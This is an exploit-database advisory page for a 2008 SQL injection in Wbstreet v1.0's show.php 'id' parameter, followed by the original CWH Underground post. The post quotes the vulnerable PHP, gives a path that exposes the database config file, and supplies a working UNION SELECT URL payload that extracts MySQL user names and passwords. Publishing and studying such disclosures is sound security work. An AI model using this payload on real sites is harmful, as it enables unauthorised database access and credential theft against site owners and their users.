Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability

vendor:

Wbstreet

by:

CWH Underground

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Wbstreet

Affected Version From: v.1.0

Affected Version To: v.1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpstreet:wbstreet:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Wbstreet v.1.0, which allows a remote attacker to inject arbitrary SQL commands via the 'id' parameter in the 'show.php' script. An attacker can exploit this vulnerability to gain access to the database, disclose sensitive information, modify data, and execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

===================================================================
  Wbstreet v.1.0 (show.php id) Remote SQL Injection Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 4 December 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Wbstreet 
 VERSION     : v.1.0
 VENDOR	     : www.phpstreet.com
 DOWNLOAD    : www.ohlanla.com/Dowsload/177254922054.zip
#####################################################

-- Remote Database Disclosure --


[+] http://[Target]/[path]/connect.inc


-- Remote SQL Injection ---

-----------------
 Vulnerable Code
-----------------

if(isset($_GET['id'])){
	$id=$_GET['id'];
}
	.
	.
	.
	.
<? 
$rs=mysql_db_query($db_name, "select * from topic where id=$id");  <<<< Bug !!!!
$row=mysql_fetch_array($rs);
?>

----------
 Exploit
----------

[+] http://[Target]/[path]/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user


#####################################################################
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-12-04]